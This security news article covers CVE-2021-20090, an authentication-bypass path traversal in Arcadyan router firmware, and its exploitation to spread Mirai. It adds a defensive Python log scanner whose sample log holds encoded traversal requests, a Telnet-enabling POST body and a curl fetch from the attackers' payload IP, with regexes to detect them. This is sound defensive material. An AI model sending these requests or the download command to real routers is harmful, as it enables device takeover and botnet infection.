A serious vulnerability that has existed for years in Arcadyan firmware threatens IoT security as attackers exploit it to target routers. Threat actors are actively exploiting the bug to deploy Mirai botnet payloads.
Years-Old Arcadyan Firmware Vulnerability
A security researcher from Tenable has shared insights about a serious bug affecting millions of routers.
According to the report, the vulnerability resides in the Arcadyan firmware that powers routers from multiple vendors. Specifically, the researcher found a path traversal vulnerability (CVE-2021-20090) that allows an authentication bypass. Hence, an unauthenticated remote attacker can exploit the flaw to take over target devices.
In the case of routers, this becomes a critical bug, since taking over the router means taking over the victim's entire network.
Notably, the bug has existed for around 10 years. The researcher discovered it while inspecting the Buffalo WSR-2533DHPL2 router, but further digging revealed that it actually affects 20 different router models from 17 vendors. Thus, it has the potential to enable large-scale supply-chain attacks.
Tenable has shared the list of affected devices and the PoC in an advisory along with a detailed whitepaper. The following video also demonstrates the exploit.
A little video demo from the Buffalo writeup ( https://t.co/ySft5EP299 ) : pic.twitter.com/1ulDi0CyXZ
— evan grant (@stargravy) August 3, 2021
Active Exploits Threaten Routers Globally
Soon after Tenable made its report public, researchers from Juniper Networks noticed active exploitation of the vulnerability.
According to their blog post, the researchers found the attackers exploiting it to deploy Mirai botnet payloads. The attacks trace back to an IP address in Wuhan, China, and are delivered via HTTP POST requests. As stated,
The attacker will modify the configuration of the attacked device to enable Telnet using “ARC_SYS_TelnetdEnable=1” then proceeds to download a new script from the IP address 212.192.241[.]72 using either wget or curl and then executes it.
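For defenders reviewing router or reverse-proxy access logs, the activity Juniper describes leaves three recognisable traces: a request path containing a directory traversal sequence (after URL decoding), a POST body that sets ARC_SYS_TelnetdEnable=1, and a reference to the payload-hosting IP 212.192.241[.]72. The script below is an added illustration, not code from Tenable, Juniper or the article, and it runs over a constructed sample log in a simple hypothetical format (source IP, quoted request line, status, quoted body); the endpoint names in the sample are placeholders, not the real affected CGI paths.

```python
import re
from urllib.parse import unquote

# Constructed sample log (hypothetical format, not real router logs):
# <src_ip> "<METHOD> <raw path>" <status> "<request body>"
SAMPLE_LOG = """\
10.0.0.5 "GET /index.htm" 200 ""
203.0.113.9 "POST /images/..%2fplaceholder_admin.cgi" 200 "ARC_SYS_TelnetdEnable=1"
203.0.113.9 "POST /images/%252e%252e/placeholder_admin.cgi" 200 "cmd=curl http://212.192.241.72/placeholder.sh"
10.0.0.7 "POST /login.cgi" 302 "user=admin"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) "(?P<body>.*)"$'
)

# Indicator quoted by Juniper (defanged in their text as 212.192.241[.]72).
IOC_IP = "212.192.241.72"
# Configuration key the attacker flips to expose Telnet, per the Juniper quote.
TELNET_ENABLE_RE = re.compile(r"(^|&)ARC_SYS_TelnetdEnable=1($|&)")
# A ".." path segment, matched only after decoding.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def decode_path(raw_path: str) -> str:
    """Decode twice so single (%2f) and double (%252e) encodings both normalise."""
    return unquote(unquote(raw_path))


def classify(line: str):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m["path"])
    findings = []
    if TRAVERSAL_RE.search(path):
        findings.append("path_traversal")
    if TELNET_ENABLE_RE.search(m["body"]):
        findings.append("telnet_enable")
    if IOC_IP in m["body"] or m["src"] == IOC_IP:
        findings.append("known_ioc_ip")
    return {"src": m["src"], "method": m["method"], "path": path, "findings": findings}


def scan(log_text: str):
    """Return only the parsed lines that carry at least one finding."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = classify(line)
        if r and r["findings"]:
            results.append(r)
    return results


def summarize_by_source(log_text: str):
    """Map each source IP to the set of finding types seen from it."""
    summary = {}
    for r in scan(log_text):
        summary.setdefault(r["src"], set()).update(r["findings"])
    return summary


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["src"], r["method"], r["path"], ",".join(r["findings"]))
    print(summarize_by_source(SAMPLE_LOG))
```

Decoding the path before matching matters: a traversal hidden behind %2f or a double-encoded %252e would slip past a check on the raw request line. Grouping findings by source IP is what turns three separate hits into one actionable alert.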
Given that it may take time for users to apply the patches, the attackers have enough time to wage large-scale campaigns.
Therefore, all users should update their routers to patch this vulnerability at the earliest opportunity.